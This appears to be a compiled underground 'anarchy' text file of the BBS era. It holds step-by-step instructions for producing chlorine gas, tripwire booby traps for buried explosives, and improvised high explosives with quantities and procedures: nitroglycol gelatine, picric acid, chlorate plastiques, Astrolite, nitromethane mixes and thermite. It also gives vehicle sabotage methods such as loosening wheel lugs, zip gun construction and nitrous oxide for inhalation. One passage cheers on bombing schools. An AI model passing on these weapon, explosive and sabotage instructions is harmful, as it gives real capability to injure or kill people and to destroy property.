knowledge of chemistry, especially for the more dangerous experiments.

 I am not responsible for any injury or damage caused by people using this
information.  It is provided for use by people knowledgable in chemistry who
are interested in such experiments and can safely handle such experiments.

I.  A LIST OF HOUSEHOLD CHEMICALS AND THEIR COMPOSITION

VINEGAR: 3-5% ACETIC ACID              BAKING SODA: SODIUM BICARBONATE
DRAIN CLEANERS: SODIUM HYDROXIDE       SANI-FLUSH: 75% SODIUM BISULFATE
AMMONIA WATER: AMMONIUM HYDROXIDE      CITRUS FRUIT: CITRIC ACID
TABLE SALT: SODIUM CHLORIDE            SUGAR: SUCROSE
MILK OF MAGNESIA-MAGNESIUM HYDROXIDE   TINCTURE OF IODINE- 4% IODINE
RUBBING ALCOHOL- 70 OR 99% (DEPENDS ON BRAND) ISOPROPYL ALCOHOL (DO NOT DRINK!)


                           GENERATING CHLORINE GAS

 This is slightly more dangerous than the other two experiments, so you
shouild know what you're doing before you try this...

 Ever wonder why ammonia bottles always say 'do not mix with chlorine bleach',
and visa-versa? That's because if you mix ammonia water with ajax or something
like it, it will give off chlorine gas. To capture it, get a large bottle and
put ajax in the bottom.  then pour some ammonia down into the bottle.  since
the c hlorine is heavier than air, it will stay down in there unless you use
large amounts of either ajax or ammonia (don't!).


                            CHLORINE + TURPENTINE

 Take a small cloth or rag and soak it in turpentine. Quickly drop it into the
bottle of chlorine. It should give off a lot of black smoke and probably start
burning...

                           GENERATING HYDROGEN GAS

 To generate hydrogen, all you need is an acid and a metal that will react
with that acid.  Try vinegar (acetic acid) with zinc, aluminum, magnesium,
etc.  You can collect hydrogen in something if you note that it is lighter
than air....  light a small amount and it burns with a small *pop*.

  Another way of creating hydrogen is by the electrolysis of water.  this
involve sseperating water (H2O) into hydrogen and oxygen by an electric
current. To do this, you need a 6-12 volt battery (or a DC transformer), two
test tubes, a large bowl, two carbon electrodes (take them out of an unworking
6-12 volt battery), and table salt. Dissolve the salt in a large bowl full of
water. Submerge the two test tubes in the water and put the electrodes inside
them, with the mouth of the tube aiming down.  Connect the battery to some
wire going down to the electrodes.

   This will work for a while, but chlorine will be generated along with the
oxygen which will corrode your copper wires leading to the carbon
electrodes...  (the table salt is broken up into chlorine and sodium ions, the
chlorine comes off as a gas with oxygen while sodium reacts with the water to
form sodium hydroxide....).  therefore, if you can get your hands on some
sulfuric acid, use it instead.  it will not affect the reaction other than
making the water conduct electricity.

WARNING:  DO NOT use a transformer that outputs AC current! Not only is AC
         inherently more dangerous than DC, it also produces both Hydrogen and
         Oxygen at each electrode.


                             HYRDOGEN + CHLORINE

 Take the test tube of hydrogen and cover the mouth with your thumb. Keep it
inverted, and bring it near the bottle of chlorine (not one that has reacted
with turpentine).  Say "goodbye test tube", and drop it into the bottle.  The
hydrogen and chlorine should react and possibly explode (depending on purity
and amount of each gas).  An interesting thing about this is they will not
react if it is dark and no heat or other energy is around. When a light is
turned on, enough energy is present to cause them to react...

                            PREPARATION OF OXYGEN

    Get some hydrogen peroxide (from a drug store) and manganese dioxide (from
a battery- it's a black powder).  Mix the two in a bottle, and they give off
oxygen. If the bottle is stoppered, pressure will build up and shoot it off.

     Try lighting a wood splint and sticking it (when only glowing) into the
bottle. The oxygen will make it burst into flame. The oxygen will allow things
to burn better...

                                    IODINE

   Tincture of iodine contains mainly alcohol and a little iodine.  To
seperate them, put the tincture of iodine in a metal lid to a bottle and heat
it over a candle.  Have a stand holding another metal lid directly over the
tincture (about 4-6 inches above it) with ice on top of it.  The alcohol
should evaporate, and the iodine should sublime, but should reform iodine
crystals on the cold metal lid directly above.  If this works (I haven't
tried), you can use the iodine along with household ammonia to form nitrogen
triiodide.
                                            ...ZAPHOD BEEBLEBROX/MPG!

   I have found that Pool Chlorine tablets with strong household ammonia react
to produce LOTS of chlorine gas and heat... also mixing the tablets with
rubbing alcohol produces heat, a different (and highly flammable) gas, and
possibly some sort of acid (it eats away at just about anything it touches)

                                        David Richards


                                  TRIPWIRES
         by The Mortician

    Well first of all I reccommend that you read the file on my board about
landmines...  If you can't then here is the concept.

  You can use an m-80,h-100, blockbuster or any other type of explosive that
will light with a fuse. Now the way this works is if you have a 9 volt
battery, get either a solar igniter (preferably) or some steel wool you can
create a remote ignition system.  What you do it set up a schematic like this.

  ------------------>+ batery
 steel ||          ->- batery
 wool ||            /
 :==:--- <--fuse    \
  ||                /
  ---- spst switch--\

   So when the switch is on the currnet will flow through the steel wool or
igniter and heat up causing the fuse to light.
  Note: For use with steel wool try it first and get a really thin piece of
wire and pump the current through it to make sure it will heat up to light the
explosive.

   Now the thing to do is plant your explosive wherever you want it to be,bury
it and cover the wires.  Now take a fishing line (about 20 lb. test) and tie
one end to a secure object.  Have your switch secured to something and make a
loop on the other end on the line. Put the loop around the switch such that
when pulled it will pull the switch and set off the explosive.

   To ignite the explosive...  The thing to do is to experiment with this and
find your best method...  Let me know on any good kills, or new techniques...
On my board... (201)376-4462


  BOOBY TRAP TRIP WIRES......      BY Vlad Tepes (of Chgo C64 fame)

   Here is a method for constructing boobytraps which I personally invented,
and which I have found to work better than any other type of release booby
trap.

    There are many possible variations on this design, but the basic premise
remains the same. What you'll need:

  3-4 nails each 2 inches long and soft enough to
      bend easily (galvanized iron works well)
    6 feet of wire or fishing line
 5-15 feet of strong string or rope
    1 really sick mind.

    Hammer two of the nails into the trunk of a tree (about one inch apart) so
they form a horizontal line. They should be angled slightly upward, about 30
degrees.

    Bend each nail Downward about one inch out from the trunk. Take your
nefarious device (say a small rock suspended in a tree) and rig a rope or
string so the line comes DOWN towards the two nails. Tie a loop in the string
so the loop *just* reaches between the two nails, and pass a third nail
between the two nails with the loop around this nail between the two others
(see diagrams)

      bent nails
     /                        || ^ slight upward tension
# /\                          ||
#/                         @  ||    @         ( @ are the two nails, head on)
#                  ------!----()------
#          trip wire
 \                     /
Trunk                 third nail

    Now tie one end of the fishing line to the head of the third nail, and the
other end around another tree or to a nail (in another tree, a root or a
stump etc).

    When somebody pulls on the trip wire, the nail will be pulled out and your
sick creation will be released to do it's damage (try tying it to a firing
pin).

  There are several possible variations. More than one trip wire can be
attached to the same nail, or this device can be used to arm a second trip
wire. Large wire staples or hook and eye loops can be used to replace the two
bent nails.

     A more interesting variation uses a straight piece of metal rod with a
hole at each end, or with a short wire loop welded to each end. One end is
attached to the tripwire, the other is attached to a spring.

               ||
*/\/\/\/\/\-===()=======--------------------------------------*
  SPRING     BOLT            Trip wire

    With this design the loop will be released if the tripwire is pulled or if
it is broken. The spring should be under moderate tension and well oiled.


                            Improvised Explosives
Gelatine Explosive from Anti-Freeze         Written by: The Lich

CAUTION: THIS FORMULA ASSUMES THAT THE MAKER HAS NO QUALMS ABOUT KILLING
         HIS/HER SELF IN THE PROCESS.

 This explosive is almost the same as the nitro-gelatin plastique explosive
exept that it is supple and pliable to -10 to -20 deg. C

   Antifreeze is easier to obtain than glycerine and is usually cheaper.  It
needs to be freed of water before the manufacture and this can be done by
treating it with calcium chloride until a specific gravity of 1.12 @ o deg.
C.  or 1.11 @ 20 deg.  C.  is obtained.

    This can be done by adding calcium chloride to the antifreeze and checking
with a hydrometer and continue to add calcium chloride until the proper
reading is obtained.  The antifreeze is then filtered to remove the calcium
chloride from the liquid.  This explosive is superior to nitro-gelatin in that
it is easier to collidon the IMR smokeless powder into the explosive and that
the 50/50 ether ethyl alcohol can be done away with.  It is superior in that
the formation of the collidon is done very rapidly by the nitroethelene
glycol.

   It's detonation properties are practically the same as the nitro-gelatine.
Like the nitro-gelatine it is highly flammable and if caught on fire the
chances are good that the flame will progress to detonation.  In this
explosive as in nitro-gelatine the addition of 1% sodium carbonate is a good
idea to reduce the chance of recidual acid being present in the final
explosive.  The following is a slightly different formula than nitro-gelatine:

Nitro-glycol 75%  Guncotton (IMR) 6%  Potassium Nitrate  14%   Flour 5%

    In this process the 50/50 step is omitted.  Mix the potassium nitrate with
the nitro-glycol.  Remember that this nitro-glycol is just as sensitive to
shock as is nitroglycerin.
    The next step is to mix in the baking flour and sodium carbonate. Mix
these by kneading with gloved hands until the mixture is uniform.  This
kneading should be done gently and slowly.  The mixture should be uniform when
the IMR smokeless powder is added.  Again this is kneaded to uniformity.  Use
this explosive as soon as possible.

    If it must be stored, store in a cool, dry place (0-10 deg.  C.).  This
explosive should detonate at 7600-7800 m/sec..  These two explosives are very
powerful and should be sensitive to a #6 blasting cap or equivelent.

    These explosives are dangerous and should not be made unless the
manufacturer has had experience with this type compound.  The foolish and
ignorant may as well forget these explosives as they won't live to get to use
them.
    Don't get me wrong, these explosives have been manufactured for years with
an amazing record of safety.  Millions of tons of nitroglycerine have been
made and used to manufacture dynamite and explosives of this nature with very
few mis haps.
   Nitroglycerin and nitroglycol will kill and their main victims are the
stupid and foolhardy.  Before manufacturing these explosives take a drop of
nitroglycerin and soak into a small piece of filter paper and place it on an
anvil.
  Hit this drop with a hammer and don't put any more on the anvil.  See what I
mean! This explosive compound is not to be taken lightly.  If there are any
doubts DON'T.

Improvised Explosives Plastique Explosive from Aspirin    by: The Lich

 This explosive is a phenol dirivative.  It is HIGHLY toxic and explosive
compounds made from picric acid are poisonous if inhaled, ingested, or handled
and absor- bed through the skin.  The toxicity of this explosive restrict's
its use due to the fact that over exposure in most cases causes liver and
kidney failure and sometimes death if immediate treatment is not obtained.

 This explosive is a cousin to T.N.T.  but is more powerful than it's cousin.
It is the first explosive used militarily and was adopted in 1888 as an
artillery shell filler.  Originally this explosive was derived from coal tar
but thanks to modern chemistry you can make this explosive easily in
approximately three hours from acetylsalicylic acid (aspirin purified).

 This procedure involves dissolving the acetylsalicylic acid in warm sulfuric
acid and adding sodium or potassium nitrate which nitrates the purified
aspirin and the whole mixture drowned in water and filtered to obtain the
final product.  This explosive is called trinitrophenol.  Care should be
taken to ensure that this explosive is stored in glass containers.  Picric
acid will form dangerous salts when allowed to contact all metals exept tin
and aluminum.  These salts are primary explosive and are super sensitive.
They also will cause the detonation of the picric acid.

 To make picric acid obtain some aspirin.  The cheaper brands work best but
buffered brands should be avoided.  Powder these tablets to a fine
consistancy. To extract the acetylsalicylic acid from this powder place this
powder in methyl alcohol and stir vigorously.  Not all of the powder will
dissolve.  Filter this powder out of the alcohol.  Again wash this powder that
was filtered out of the alcohol with more alcohol but with a lesser amount
than the first extraction.  Again filter the remaining powder out of the
alcohol.  Combine the now clear alcohol and allow it to evaporate in a pyrex
dish.  When the alcohol has evaporated there will be a surprising amount of
crystals in the bottom of the pyrex dish.

 Take forty grams of these purified acetylsalicylic acid crystals and
dissolve them in 150 ml.  of sulfuric acid (98%, specify gravity 1.8) and heat
to diss- olve all the crystals.  This heating can be done in a common electric
frying pan with the thermostat set on 150 deg.  F.  and filled with a good
cooking oil.

When all the crystals have dissolved in the sulfuric acid take the beaker,
that you've done all this dissolving in (600 ml.), out of the oil bath.  This
next step will need to be done with a very good ventilation system (it is a
good idea to do any chemistry work such as the whole procedure and any
procedure on this disk with good ventilation or outside).  Slowly start adding
58 g.  of sodium nitrate or 77 g.  of potassium nitrate to the acid mixture in
the beaker very slowly in small portions with vigorous stirring.  A red gas
(nitrogen trioxide) will be formed and this should be avoided.

  The mixture is likely to foam up and the addition should be stopped until
the foaming goes down to prevent the overflow of the acid mixture in the
beaker.  When the sodium or potassium nitrate has been added the mixture is
allowed to cool somewhat (30- 40 deg.  C.). The solution should then be dumped
slowly into twice it's volume of crushed ice and water.  The brilliant yellow
crystals will form in the water. These should be filtered out and placed in
200 ml.  of boiling distilled water. This water is allowed to cool and then
the crystals are then filtered out of the water.  These crystals are a very,
very pure trinitrophenol.  These crystals are then placed in a pyrex dish and
places in an oil bath and heated to 80 deg. C.  and held there for 2 hours.
This temperature is best maintained and checked with a thermometer.

  The crystals are then powdered in small quantities to a face powder
consistency.  These powdered crystals are then mixed with 10% by weight wax
and 5% vaseline which are heated to melting temperature and poured into the
crystals.  The mixing is best done by kneading together with gloved hands.
This explosive should have a useful plsticity range of 0-40 deg.  C..  The
detonation velocity should be around 7000 m/sec..  It is toxic to handle but
simply made from common ingredients and is suitable for most demolition work
requiring a moderately high detonation velocity.  It is very suitable for
shaped charges and some steel cutting charges.  It is not as good an explosive
as C-4 or other R.D.X.  based explosives but it is much easier to make.  Again
this explosive is very toxic and should be treated with great care.

  AVOID HANDLING BARE-HANDED, BREATHING DUST AND FUMES, AVOID ANY CHANCE OF
INGESTION. AFTER UTENSILS ARE USED FOR THE MANUFACTURE OF THIS EXPLOSIVE
RETIRE THEM FROM THE KITCHEN AS THE CHANCE OF POISONING IS NOT WORTH THE RISK.
THIS EXPLOSIVE, IF MANUFACTURED AS ABOVE, AHOULD BE SAFE IN STORAGE BUT WITH
ANY HOMEMADE EXPLOSIVE STORAGE OS NOT RECOMENDED AND EXPLOSIVES SHOULD BE MADE
UP AS NEEDED.


Improvised Explosives Plastique Explosive from Bleach     by: The Lich

 This explosive is a potassium chlorate explosive.  This explosive and
explosives of similar composition were used in World War II as the main
explosive filler in gernades, land mines, and mortar used by French, German,
and other forces involoved in that conflict.  These explosives are relatively
safe to manufacture.

  One should strive to make sure these explosives are free of sulfur,
sulfides, and picric acid.  The presence of these compounds result in mixtures
that are or can become highly sensitive and possibly decompose ex- plosively
while in storage.  The manufacture of this explosive from bleach is given as
just an expediant method.  This method of manufacturing potassium chlorate is
not economical due to the amount of energy used to boil the solution and cause
the 'dissociation' reaction to take place.  This procedure does work and
yields a relatively pure and a sulfur/sulfide free product.  These explosives
are very cap sensitive and require only a #3 cap for instigating detonation.

  To manufacture potassium chlorate from bleach (5.25% sodium hypochlorite
solution) obtain a heat source (hot plate etc.) a battery hydrometer, a large
pyrex or enameled steel container (to weigh chemicals), and some potassium
chloride (sold as salt substitute).  Take one gallon of bleach, place it in
the container and begin heating it.  While this solution heats, weigh out 63
g.  potassium chloride and add this to the bleach being heated. Bring this
solution to a boil and boiled until when checked by a hydrometer the reading
is 1.3 (if a battery hydrometer is used it should read full charge).

 When the reading is 1.3 take the solution and let it cool in the refrigerator
until it's between room temperature and 0 deg.  C..  Filter out the crystals
that have formed and save them.  Boil the solution again until it reads 1.3 on
the hydrometer and again cool the solution.  Filter out the crystals that have
formed and save them.  Boil this solution again and cool as before.

  Filter and save the crystals.  Take these crystals that have been saved and
mix them with distilled water in the following proportions: 56 g.  per 100 ml.
distilled water.  Heat this solution until it boils and allow it to cool.
Filter the solution and save the crystals that form upon cooling.  The process
if purifi- cation is called fractional crystalization.  These crystals should
be relatively pure potassium chlorate.

 Powder these to the consistency of face powder (400 mesh) and heat gently to
drive off all moisture.  Melt five parts vasoline and five parts wax.
Dissolve this in white gasoline (camp stove gasoline) and pour this liquid on
90 parts potassium chlorate (the crystals from the above operation) in a
plastic bowl. Knead this liquid into the potassium chlorate until immediately
mixed.  Allow all the gasoline to evaporate.  Place this explosive in a cool,
dry place.  Avoid friction, sulfur, sulfide, and phosphorous compounds.

     This explosive is best molded to the desired shape and density
(1.3g./cc.) and dipped in wax to water proof.  These block type charges
guarantee the highest detonation velocity.  This explosive is really not
suited to use in shaped charge applications due to its relatively low
detonation velocity.  It is comparable to 40% ammonia dynamite and can be
considered the same for the sake of charge computation.

    If the potassium chlorate is bought and not made it is put into the
manufacture pro- cess in the powdering stages preceding the addition of the
wax/vaseline mix- ture.  This explosive is bristant and powerful.  The
addition of 2-3% aluminum powder increases its blast effect.  Detonation
velocity is 3300 m/sec..


Plastique Explosives From Swimming Pool Chlorinating Compound    By the Lich

 This explosive is a chlorate explosive from bleach.  This method of
production of potassium or sodium chlorate is easier and yields a more pure
product than does the plastique explosive from bleach process.

  In this reaction the H.T.H. (calcium hypochlorite CaC10) is mixed with water
and heated with either sodium chloride (table salt, rock salt) or potassium
chloride (salt substitute).  The latter of these salts is the salt of choice
due to the easy crystalization of the potassium chlorate.

  This mixture will need to be boiled to ensure complete reaction of the
ingredients.  Obtain some H.T.H.  swimming pool chlorination compound or
equivilant (usually 65% calcium hypochlorite).  As with the bleach process
mentioned earlier the reaction described below is also a dissociation
reaction.  In a large pyrex glass or enamled steel container place 1200g.
H.T.H. and 220g.  potassium chloride or 159g.  sodium chloride.  Add enough
boiling water to dissolve the powder and boil this solution.  A chalky
substance (calcium chloride) will be formed.  When the formation of this
chalky substance is no longer formed the solution is filtered while boiling
hot.  If potassium chloride was used potassium chlorate will be formed.

    This potassium chlorate will drop out or crystalize as the clear liquid
left after filtering cools.  These crystals are filtered out when the solution
reaches room temperature.  If the sodium chloride salt was used this clear
filtrate (clear liquid after filter- ation) will need to have all water
evaporated.  This will leave crystals which should be saved.

    These crystals should be heated in a slightly warm oven in a pyrex dish to
drive off all traces of water (40-75 deg.  C.).  These crystals are ground to
a very fine powder (400 mesh).

    If the sodium chloride salt is used in the initial step the crystalization
is much more time consuming.  The potassium chloride is the salt to use as the
resulting product will crystalize out of the solution as it cools.  The
powdered and completely dry chlorate crystals are kneaded together with
vaseline in a plastic bowl.  ALL CHLORATE BASED EXPLOSIVES ARE SENSITIVE TO
FRICTION AND SHOCK AND THESE SHOULD BE AVOIDED.  If sodium chloride is used in
this explosive it will have a tendancy to cake and has a slightly lower
detonation velocity.

  This explosive is composed of the following:

 potassium/sodium chlorate 90%        vaseline  10%

   Simply pour the powder into a plastic baggy and knead in the vaseline
carefully. this explosive (especially if the Sodium Chlorate variation is
used) should not be exposed to water or moisture.

 The detonation velocity can be raised to a slight extent by the addition of
2-3% aluminum substituted for 2-3% of the vaseline.  This addition of this
aluminum will give the explosive a bright flash if set off at night which will
ruin night vision for a short while.  The detonation velocity of this
explosive is approximately 3200 m/sec.  for the potassium salt and 2900 m/sec.
for the sodium salt based explosive.

Addendum 4/12/91:

   It was claimed above that this explosive degrades over time. I would assume
that this occurs due to the small amount of water present in the vaseline, and
that a different type of fuel would be better than the vaseline.


ASSORTED NASTIES:

                                  Sweet-Oil
 In this one you open there hood and pour some honey in their oil spout.  if
you have time you might remover the oil plug first and drain some of the oil
out.  I have tried this one but wasn't around to see the effects but I am sure
that I did some damage.

                                   Slow Air
 Ok, sneak up the victims car and poke a small hole somewhere in 2 of his/her
tires.  They only have 1 spare.  Now if the hole is small but there then there
tire will go flat some where on the road.  You could slice the tire so this is
blows out on the road wih a razor blade.  Cut a long and fairly deep (don't
cut a hole all the way through) and peel a little bit of the rubber back and
cut that off.  Now very soon there tires will go flat or a possible blow out
at a high speed if your lucky.

                               Vanishing Paint
 Spread a little gas or paint thiner on the victims car and this will make his
paint run and fade.  Vodka will eat the paint off and so will a little 190.
Eggs work great on paint if they sit there long enough.

                                 Loose Wheel
 Loosen the lugs on you victums tires so that they will soon fall off.  This
can really fuck some one up if they are cruising when the tire falls off.

                                 Dual Neutral
   This name sucks but pull the 10 bolt or what ever they have there off.  (On
the real wheels, in the middle of the axle) Now throw some screws, blots, nuts
and assorted things in there and replace the cover. At this point you could
chip some of the teeth off the gears.

                                  Un-Midaser
 Crawl under there car with a rachet and losen all the nuts on their exhaust
so that it hangs low and will fall off soon. This method also works on
transmissions but is a little harder to get all bolts off, but the harder you
work the more you fuck them over.


                                 LAUGHING GAS

Learn how to make laughing gas from ammonium nitrate. Laughing gas was one of
the earliest anaesthetics.  After a little while of inhaling the gas the
patient became so happy [ain't life great?] he couldn't keep from laughing.
Finally he would drift off to a pleasant sleep.

   Some do-it-yourselfers have died while taking laughing gas.  This is
because they has generated it through plastic bags while their heads were
inside. They were simply suffocating but were too bombed out to realize it.
   The trick is to have a plastic clothes bag in which you generate a lot of
the gas.  Then you stop generating the gas and hold a small opening of the bag
under your nose, getting plenty of oxygen in the meantime.  Then, Whee!
  To make it you start with ammonium nitrate bought from a chemical supply
house or which you have purified with 100% rubbing or wood alcohol.

  First, dissolve a quantity of ammonium nitrate in some water.  Then you
evaporate the water over the stove, while stirring, until you have a heavy
brine.  When nearly all the moisture is out it should solidify instantly when
a drop is put on an ice cold metal plate.

  When ready, dump it all out on a very cold surface.  After a while, break
it up and store it in a bottle.

   A spoonful is put into a flask with a one-hole stopper, with a tube leading
into a big plastic bag.  The flask is heated with an alcohol lamp.

   When the temperature in the flask reaches 480 F the gas will generate.  If
white fumes appear the heat should be lowered as the stuff explodes at 600 F.

  When the bag is filled, stop the action and get ready to turn on.

CAUTION:  N2O supplants oxygen in your blood, but you don't realize it.  It's
        easy to die from N2O because you're suffocating and your breathing
        reflex doesn't know it.  Do not put your head in a plastic bag
        (duhh...) because you will cheerfully choke to death.

                              PIPE OR "ZIP" GUNS

    Commonly known as "zip" guns, guns made from pipe have been used for years
by juvenile punks.  Today's Militants   make them just for the hell of it or
to shoot once in an   assassination or riot and throw away if there is any
danger of apprehension.

    They can be used many times but with some, a length of dowel is needed to
force out the spent shell.

    There are many variations but the illustration shows the basic design.

    First, a wooden stock is made and a groove is cut for the barrel to rest
in.  The barrel is then taped securely to the stock with a good, strong
tape.

    The trigger is made from galvanized tin.  A slot is punched in the trigger
flap to hold a roofing nail, which is wired or soldered onto the flap.  The
trigger is bent and nailed to the stock on both sides.

    The pipe is a short length of one-quarter inch steel gas or water pipe
with a bore that fits in a cartridge, yet keeps the cartridge rim from passing
through the pipe.

    The cartridge is put in the pipe and the cap, with a hole bored through
it, is screwed on.  Then the trigger is slowly released to let the nail pass
through the hole and   rest on the primer.

    To fire, the trigger is pulled back with the left hand and held back with
the thumb of the right hand.  The gun is then aimed and the thumb releases the
trigger and the thing actually fires.

    Pipes of different lengths and diameters are found in any hardware store.
All caliber bullets, from the .22 to the .45 are used in such guns.

    Some zip guns are made from two or three pipes nested within each other.
For instance, a .22 shell will fit snugly into a length of a car's copper gas
line. Unfortunatey, the copper is too weak to withstand the pressure of the
firing.  So the length of gas line is spread   with glue and pushed into a
wider length of pipe.  This is   spread with glue and pushed into a length of
steel pipe with threads and a cap.

    Using this method, you can accomodate any cartridge, even a rifle shell.
The first size of pipe for a rifle   shell accomodates the bullet.  The second
accomodates its wider powder chamber.

    A 12-gauge shotgun can be made from a 3/4 inch steel pipe.  If you want to
comply with the gun laws, the barrel should be at least eighteen inches long.

    Its firing mechanism is the same as that for the pistol. It naturally has
a longer stock and its handle is lengthened into a rifle butt.  Also, a small
nail is driven half way into each side of the stock about four inches in the
front of the trigger.  The rubber band is put over one nail and   brought
around the trigger and snagged over the other nail.

    In case you actually make a zip gun, you should test it before firing it
by hand.  This is done by first tying the gun to a tree or post, pointed to
where it will do no damage.  Then a string is tied to the trigger and you go
off several yards.  The string is then pulled back and let go. If the barrel
does not blow up, the gun is (probably) safe to fire by hand. Repeat firings
may weaken the barrel, so NO zip gun can be considered "safe" to use.


Astrolite and Sodium Chlorate Explosives By: Future Spy & The Fighting Falcon

Note: Information on the Astrolite Explosives were taken from the book
 'Two Component High Explosive Mixtures' By Desert Pub'l

Some of the chemicals used are somewhat toxic, but who gives a fuck! Go ahead!
I won't even bother mentioning 'This information is for enlightening purposes
only'! I would love it if everyone made a gallon of astrolite and blew their
fucking school to kingdom scum!

                                  Astrolite

The astrolite family of liquid explosives were products of rocket propellant
research in the '60's.  Astrolite A-1-5 is supposed to be the world's most
powerful non-nuclear explosive -at about 1.8 to 2 times more powerful than
TNT. Being more powerful it is also safer to handle than TNT (not that it
isn't safe in the first place) and Nitroglycerin.

                                 Astrolite G
"Astrolite G is a clear liquid explosive especially designed to produce very
high detonation velocity, 8,600MPS (meters/sec.), compared with 7,700MPS for
nitroglycerin and 6,900MPS for TNT...In addition, a very unusual
characteristic is that it the liquid explosive has the ability to be absorbed
easily into the ground while remaining detonatable...In field tests, Astrolite
G has remained detonatable for 4 days in the ground, even when the soil was
soaked due to rainy weather" know what that means?....Astrolite Dynamite!

              To make (mix in fairly large container & outside)
    Two parts by weight of ammonium nitrate mixed with one part by weight
'anhydrous' hydrazine, produces Astrolite G...Simple enough eh? I'm sure that
the 2:1 ratio is not perfect,and that if you screw around with it long enough,
that you'll find a better formula.  Also, dunno why the book says 'anhydrous'
hydrazine, hydrazine is already anhydrous...

    Hydrazine is the chemical you'll probably have the hardest time getting
hold of. Uses for Hydrazine are: Rocket fuel, agricultural chemicals (maleic
hydra-zide), drugs (antibacterial and antihypertension), polymerization
catalyst, plating metals on glass and plastics, solder fluxes, photographic
developers, diving equipment.  Hydrazine is also the chemical you should be
careful with.

                              Astrolite A/A-1-5
Mix 20% (weight) aluminum powder to the ammonium nitrate, and then mix with
hydrazine.  The aluminum powder should be 100 mesh or finer.  Astrolite A has
a detonation velocity of 7,800MPS.

                                 Misc.  info
You should be careful not to get any of the astrolite on you,if it happens
though, you should flush the area with water.  Astrolite A&G both should be
able to be detonated by a #8 blasting cap.


                           Sodium Chlorate Formulas

Sodium Chlorate is similar to potassium chlorate,and in most cases can be a
substitute.  Sodium chlorate is also more soluble in water.  You can find
sodium chlorate at Channel or any hardware/home improvement store.  It is used
in blowtorches and you can get about 3lbs for about $6.00.

                          Sodium Chlorate Gunpowder

65% sodium chlorate, 22% charcoal, 13% sulfur, sprinkle some graphite on top.

                                 Rocket Fuel
6 parts sodium chlorate mixed *THOROUGHLY* with 5 parts rubber cement.

                      Rocket Fuel 2 (better performance)

50% sodium chlorate, 35% rubber cement ('One-Coat' brand),
10% epoxy resin hardener, 5% sulfur

You may want to add more sodium chlorate depending on the purity you are using.

                              Incendiary Mixture
55% aluminum powder (atomized), 45% sodium chlorate, 5% sulfur

                                Impact Mixture
50% red phosphorus, 50% sodium chlorate

Unlike potassium chlorate,sodium chlorate won't explode spontaneously when
mix- ed with phosphorus.  It has to be hit to be detonated.

                               Filler explosive
85% sodium chlorate, 10% vaseline, 5% aluminum powder

                            Nitromethane formulas
I thought that I might add this in since it's similar to Astrolite.

Nitromethane (CH3NO2)              specific gravity:1.139
flash point:95f                    auto-ignite:785f

Derivation: reaction of methane or propane with nitric acid under pressure.
Uses:       Rocket fuel; solvent for cellulosic compounds, polymers, waxes,
fats, etc.

To be detonated with a #8 cap, add:

1) 95% nitromethane + 5% ethylenediamine 2) 94% nitromethane + 6% aniline

Power output: 22-24% more powerful than TNT.  Detonation velocity of 6,200MPS.

                       Nitromethane 'solid' explosives
2 parts nitromethane, 5 parts ammonium nitrate (solid powder)

soak for 3-5 min.  when done,store in an air-tight container.  This is
supposed to be 30% more powerful than dynamite containing 60% nitro-glycerin,
and has 30% more brilliance.


            MERCURY BATTERY BOMB!      By Phucked Agent!

Materials:

1 Mercury Battery (1.5 or 1.4 V Hearing Aid), 1 working lamp with on/off 
  switch

  It is VERY SIMPLE!!! Hurray! Kids under 18 shouldn't considered try this 
  one or else they would have mercuric acid on their faces!

1.  Turn the lamp switch on to see if lite-bulb lights up.
2.  If work, leave the switch on and unplug the cord
3.  Unscrew the bulb (Dont touch the hot-spot!)
4.  Place 1 Mercury Battery in the socket and make sure that it is touching
the Hot-spot contact.
5.  Move any object or furniture - Why? There may be sparx given off!
6.  Now your favorite part, stand back and plug in cord in the socket.
7.  And you will have fun!! Like Real Party!!!


All credits go to their respective creators..

                                                -= Exodus =-
                                                        
                                                     1994
                                                     Release 4.14

                                                           PrimoPyro1990  
.... Thermite Incendiaries and Formulas ....
DISCLAIMER : The making and possesion of the following devices and mixtures
is probably illegal in most communities. The incendiaries are capable of 
burning in excess of 5400 degrees F. and are next to impossible to 
extinguish. If you make them you accept all responsibility for their 
possesion and use. You also accept all responsibility for your own stupidity 
and carelessness. This information is intended solely to educate.
    All Formulas are by weight Thermites are a group of pyrotechnics mixtures
in which a reactive metal reduces oxygen from a metallic oxide. This produces
a lot of heat, slag and pure metal. The most common themite is ferroaluminum 
thermite, made from aluminum (reactive metal) and iron oxide (metal oxide). 
When it burns it produces aluminum oxide (slag) and pure iron. Thermite is 
usually used to cut or weld metal. As an experiment, a 3lb. brick of thermite
was placed on an aluminum engine block. After the thermite was done burning, 
only a small portion of block was melted. However, the block was very warped 
out of shape plus there were cracks all through the block. Ferro-thermite 
produces about 930 calories per gram. The usual proportions of ferro-thermite
are 25% aluminum and 75% iron oxide. The iron oxide usually used is not rust 
(Fe2O3) but iron scale (Fe3O4). Rust will work but you may want to adjust the
mixture to about 77% rust. The aluminum is usually coarse powder to help slow
down the burning rate. The chemicals are mixed together thoroughly and 
compressed into a suitable container. A first fire mix is poured on top and 
ignited.  NOTE: Thermites are generally very safe to mix and store. They are 
not shock or friction sensitive and ignite at about 2000 degrees F. A first 
fire mix is a mixture that ignites easier than thermite and burns hot enough 
to light the thermite reliably. 

                          A very good one is :                  
Potassium Nitrate 5 parts
Fine ground Aluminum 3 parts
Sulfur 2 parts

   Mix the above thoroughly and combine 2 parts of it with 1 part of finely 
powdered ferro-thermite. The resulting mixture can be light by safety fuse 
and burns intensely. One problem with thermites is the difference in weight 
between the aluminum and the oxide. This causes them to separate out 
rendering the thermite useless. One way to fix this is to use a binder to 
hold the chemicals to eachother. Sulfur is good for this. Called Diasite, 
this formula uses sulfur to bind all the chemicals together. It's drawback is
the thermite must be heated to melt the sulfur. Iron Oxide 70 % Aluminum 23 %
Sulfur 7 %. Mix the oxide and aluminum together and put them in an oven at 
325 degrees F. and let the mix heat for a while. When the mixture is hot 
sprinkle the sulfur over it and mix well. Put this back in the oven for a few
minutes to melt all the sulfur. Pull it back out and mix it again. While it 
is still hot, load into containers for use. When it cools, drill out the 
diasite to hold about 10-15 grams of first fire mix. When diasite burns it 
forms sulfide compounds that release hydrogen sulfide when in contact with 
water. This rotten egg odor can hamper fire fighting efforts. Thermite can be
made not to separate by compressing it under a couple of tons pressure. The 
resulting pellet is strong and burns slower than thermite powder. 

                            CAST THERMITE: 
   This formula can be cast into molds or containers and hardens into a solid
mass. It does not produce as much iron as regular ferro-thermite, but it 
makes a slag which stays liquid a lot longer. Make a mixtures as follows.
Plaster of Paris 2 parts Fine and Coarse  
Mixed Aluminum 2 parts
Iron Oxide 3 parts
